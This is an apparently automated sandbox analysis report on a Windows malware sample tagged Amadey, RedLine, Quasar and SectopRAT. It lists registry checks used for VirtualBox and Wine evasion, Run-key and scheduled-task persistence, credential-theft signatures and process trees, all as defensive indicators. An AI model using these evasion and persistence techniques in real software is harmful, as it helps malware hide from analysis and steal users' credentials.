Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-cf4r7avgmh
Target f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe
SHA256 f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce
Tags
amadey 0657d1 fed3aa discovery evasion persistence trojan quasar redline sectoprat exodusmarket.io office04 credential_access infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce

Threat Level: Known bad

The file f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe was found to be: Known bad.

Malicious Activity Summary

amadey 0657d1 fed3aa discovery evasion persistence trojan quasar redline sectoprat exodusmarket.io office04 credential_access infostealer rat spyware stealer

Quasar RAT

RedLine payload

Amadey

SectopRAT payload

RedLine

Quasar payload

SectopRAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Checks BIOS information in registry

Identifies Wine through registry keys

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Modifies registry class

Enumerates system info in registry

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 02:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 02:02

Reported

2024-07-31 02:04

Platform

win7-20240705-en

Max time kernel

32s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\d42f45addf.exe = "C:\\Users\\Admin\\1000029002\\d42f45addf.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\c81c483364.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\c81c483364.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\d42f45addf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\1000029002\d42f45addf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2064 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe
PID 2512 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1572 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1856 wrote to memory of 1800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1128 wrote to memory of 2244 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CEA5.tmp\CEA6.tmp\CEA7.bat C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.0.1973984473\1342185228" -parentBuildID 20221007134813 -prefsHandle 1260 -prefMapHandle 1252 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dc99275-6378-401c-aee2-3e916a331c64} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 1324 10ad8058 gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1892 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1904 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.1.38466447\1580264963" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f23d13a-66c8-4592-a7b8-08208f55bf3e} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 1536 f8ed258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.2.2061216034\733566373" -childID 1 -isForBrowser -prefsHandle 2200 -prefMapHandle 2196 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e11bda11-c4ee-4788-974e-4af15dbc0166} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 2260 199e5358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.3.143158820\952057950" -childID 2 -isForBrowser -prefsHandle 2976 -prefMapHandle 2972 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbed8261-4483-4324-931d-75b8ed9dff5f} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 2988 1dad4a58 tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2148 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1316 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.4.43057313\1610499545" -childID 3 -isForBrowser -prefsHandle 3720 -prefMapHandle 3524 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f814a806-58cb-42b1-ae88-acb02d851694} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 3616 1bd9c458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.5.833534531\1612614412" -childID 4 -isForBrowser -prefsHandle 3796 -prefMapHandle 3812 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88342b5a-b7e4-4089-80d2-fdd0217901b2} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 3828 1f5fcc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.6.174624359\681696808" -childID 5 -isForBrowser -prefsHandle 4012 -prefMapHandle 4016 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecd91e93-ecbc-414c-8ac5-e92320231121} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 4000 206b1858 tab

C:\Users\Admin\1000029002\d42f45addf.exe

"C:\Users\Admin\1000029002\d42f45addf.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 02:02

Reported

2024-07-31 02:04

Platform

win10v2004-20240730-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A

Identifies Wine through registry keys

evasion

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
